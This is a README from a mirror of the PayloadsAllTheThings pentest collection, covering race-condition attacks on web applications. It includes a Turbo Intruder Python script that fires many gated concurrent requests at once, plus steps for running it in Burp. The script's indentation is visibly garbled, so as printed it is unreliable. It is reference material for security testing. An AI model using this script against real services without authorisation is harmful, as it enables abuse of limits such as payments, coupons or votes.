killchain-compendium/misc/PayloadsAllTheThings/Race Condition
Stefan Friese 4427517c17 bump 2022-05-31 21:08:28 +02:00
..
README.md bump 2022-05-31 21:08:28 +02:00

README.md

Race Condition

Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language.

Summary

Tools

Turbo Intruder Examples

  1. Send request to turbo intruder
  2. Use this python code as a payload of the turbo intruder
    def queueRequests(target, wordlists):
        engine = RequestEngine(endpoint=target.endpoint,
                            concurrentConnections=30,
                            requestsPerConnection=30,
                            pipeline=False
                            )
    
    for i in range(30):
        engine.queue(target.req, i)
            engine.queue(target.req, target.baseInput, gate='race1')
    
    
        engine.start(timeout=5)
    engine.openGate('race1')
    
        engine.complete(timeout=60)
    
    
    def handleResponse(req, interesting):
        table.add(req)
    
  3. Now set the external HTTP header x-request: %s - ⚠️ This is needed by the turbo intruder
  4. Click "Attack"

References